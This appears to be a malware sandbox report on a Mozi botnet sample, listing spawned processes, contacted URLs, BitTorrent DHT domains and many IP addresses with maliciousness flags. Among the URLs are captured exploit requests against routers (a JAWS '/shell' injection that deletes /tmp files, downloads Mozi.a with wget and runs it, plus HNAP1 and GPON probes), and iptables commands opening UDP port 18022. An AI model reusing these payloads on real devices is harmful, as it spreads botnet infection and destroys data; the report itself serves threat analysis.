/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT
 clean
/tmp/KnAY2OIPI3
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
 clean
There are 155 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://%s:%d/bin.sh;chmod
unknown
 malicious
http://172.82.182.74:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
172.82.182.74
 malicious
http://155.230.225.129:80/HNAP1/
155.230.225.129
 malicious
http://134.84.133.102:80/HNAP1/
134.84.133.102
 malicious
http://23.78.24.125:80/HNAP1/
23.78.24.125
 malicious
http://171.247.8.159:80/HNAP1/
171.247.8.159
 malicious
http://66.221.91.189:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
66.221.91.189
 malicious
http://%s:%d/bin.sh
unknown
 malicious
http://199.204.251.131:80/HNAP1/
199.204.251.131
 malicious
http://216.164.6.45:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
216.164.6.45
 malicious
http://173.222.98.151:80/HNAP1/
173.222.98.151
 malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
136.0.253.113
 malicious
http://168.226.35.54:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
168.226.35.54
 malicious
http://164.132.44.102:80/HNAP1/
164.132.44.102
 malicious
http://127.0.0.1:8080/GponForm/diag_Form?images/
72.43.231.74
 malicious
http://149.47.68.142:80/HNAP1/
149.47.68.142
 malicious
http://182.254.240.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
182.254.240.127
 malicious
http://38.35.98.151:80/HNAP1/
38.35.98.151
 malicious
http://65.110.89.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
65.110.89.33
 malicious
http://114.158.233.160:80/HNAP1/
114.158.233.160
 malicious
http://92.122.164.134:80/HNAP1/
92.122.164.134
 malicious
http://52.58.36.52:80/HNAP1/
52.58.36.52
 malicious
http://pastebin.ca)
unknown
 clean
http://%s:%d/Mozi.a;chmod
unknown
 clean
http://127.0.0.1:7574/UD/act?1
13.230.125.57
 clean
http://%s:%d/Mozi.m;$
unknown
 clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
 clean
http://www.pastebin.ca/upload.php
unknown
 clean
http://%s:%d/Mozi.m
unknown
 clean
http://www.alsa-project.org/cardinfo-db/
unknown
 clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
 clean
http://www.alsa-project.org/alsa-info.sh
unknown
 clean
http://%s:%d/Mozi.m;
unknown
 clean
http://%s:%d/Mozi.a;sh$
unknown
 clean
http://www.pastebin.ca.
unknown
 clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
 clean
http://127.0.0.1
unknown
 clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
 clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
 clean
http://www.alsa-project.org
unknown
 clean
http://127.0.0.1sendcmd
unknown
 clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
 clean
http://ipinfo.io/ip
unknown
 clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
 clean
http://www.pastebin.ca
unknown
 clean
http://purenetworks.com/HNAP1/
unknown
 clean
http://www.alsa-project.org.
unknown
 clean
http://HTTP/1.1
unknown
 clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
 clean
There are 39 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dht.transmissionbt.com
212.129.33.59
 clean
bttracker.acc.umu.se
130.239.18.159
 clean
router.bittorrent.com
67.215.246.10
 clean
router.utorrent.com
82.221.103.244
 clean
bttracker.debian.org
unknown
 clean

IPs

IP
Domain
Country
Malicious
185.8.165.103
unknown
Czech Republic
malicious
91.39.50.75
unknown
Germany
malicious
59.92.7.51
unknown
India
clean
121.97.146.176
unknown
Philippines
clean
211.35.117.179
unknown
Korea Republic of
clean
89.141.126.147
unknown
Spain
clean
123.45.141.9
unknown
Korea Republic of
clean
103.139.115.132
unknown
Singapore
clean
130.67.62.44
unknown
Norway
clean
73.11.11.167
unknown
United States
clean
65.171.3.34
unknown
United States
clean
217.151.165.60
unknown
Iceland
clean
121.211.248.199
unknown
Australia
clean
176.23.157.80
unknown
Denmark
clean
185.149.152.118
unknown
Lithuania
clean
68.55.232.254
unknown
United States
clean
102.198.183.70
unknown
unknown
clean
164.87.137.230
unknown
United States
clean
195.167.58.217
unknown
Greece
clean
197.81.37.161
unknown
South Africa
clean
195.220.247.126
unknown
France
clean
83.177.255.20
unknown
Sweden
clean
171.149.135.6
unknown
United States
clean
218.133.250.221
unknown
Japan
clean
216.155.36.104
unknown
United States
clean
88.128.154.190
unknown
Germany
clean
96.254.228.27
unknown
United States
clean
38.112.119.34
unknown
United States
clean
130.196.33.127
unknown
United States
clean
119.101.173.5
unknown
China
clean
124.26.145.221
unknown
Japan
clean
128.109.48.130
unknown
United States
clean
160.20.53.101
unknown
Hong Kong
clean
65.57.76.79
unknown
United States
clean
126.182.147.115
unknown
Japan
clean
74.26.22.165
unknown
United States
clean
135.91.62.232
unknown
United States
clean
101.132.239.79
unknown
China
clean
84.203.232.63
unknown
Ireland
clean
218.85.205.133
unknown
China
clean
160.173.189.54
unknown
Morocco
clean
222.191.119.202
unknown
China
clean
53.220.117.17
unknown
Germany
clean
193.115.92.108
unknown
Australia
clean
38.198.214.3
unknown
United States
clean
77.94.17.59
unknown
Kazakhstan
clean
19.252.51.218
unknown
United States
clean
29.11.239.185
unknown
United States
clean
1.151.13.11
unknown
Australia
clean
216.26.159.203
unknown
United States
clean
49.40.181.238
unknown
India
clean
129.39.197.165
unknown
United States
clean
126.66.70.2
unknown
Japan
clean
171.37.201.166
unknown
China
clean
64.227.0.234
unknown
United States
clean
167.108.60.0
unknown
Uruguay
clean
220.131.247.227
unknown
Taiwan; Republic of China (ROC)
clean
124.106.81.28
unknown
Philippines
clean
222.118.224.59
unknown
Korea Republic of
clean
32.38.64.238
unknown
United States
clean
62.37.123.164
unknown
Spain
clean
37.198.64.4
unknown
Sweden
clean
179.5.114.184
unknown
El Salvador
clean
218.99.163.37
unknown
China
clean
150.94.181.169
unknown
Japan
clean
103.167.29.254
unknown
unknown
clean
133.53.157.82
unknown
Japan
clean
105.23.23.99
unknown
Mauritius
clean
217.26.218.59
unknown
United Kingdom
clean
122.14.26.131
unknown
China
clean
165.147.231.202
unknown
South Africa
clean
27.208.150.177
unknown
China
clean
100.58.97.165
unknown
United States
clean
196.2.152.33
unknown
South Africa
clean
38.66.167.189
unknown
United States
clean
115.216.161.117
unknown
China
clean
211.249.221.67
unknown
Korea Republic of
clean
193.63.110.24
unknown
United Kingdom
clean
41.209.27.240
unknown
Kenya
clean
192.170.164.35
unknown
United States
clean
123.144.168.163
unknown
China
clean
58.178.78.48
unknown
Australia
clean
72.185.234.219
unknown
United States
clean
40.108.216.138
unknown
United States
clean
54.161.176.221
unknown
United States
clean
86.112.104.146
unknown
United Kingdom
clean
56.99.140.32
unknown
United States
clean
42.117.16.157
unknown
Viet Nam
clean
216.144.192.30
unknown
United States
clean
69.1.46.186
unknown
United States
clean
191.125.31.198
unknown
Chile
clean
98.125.252.19
unknown
United States
clean
172.200.33.30
unknown
United States
clean
221.136.83.195
unknown
China
clean
170.102.192.11
unknown
Sweden
clean
124.164.21.186
unknown
China
clean
20.177.182.208
unknown
United States
clean
162.165.207.141
unknown
United States
clean
181.228.162.132
unknown
Argentina
clean
182.90.150.203
unknown
China
clean
There are 90 hidden IPs, click here to show them.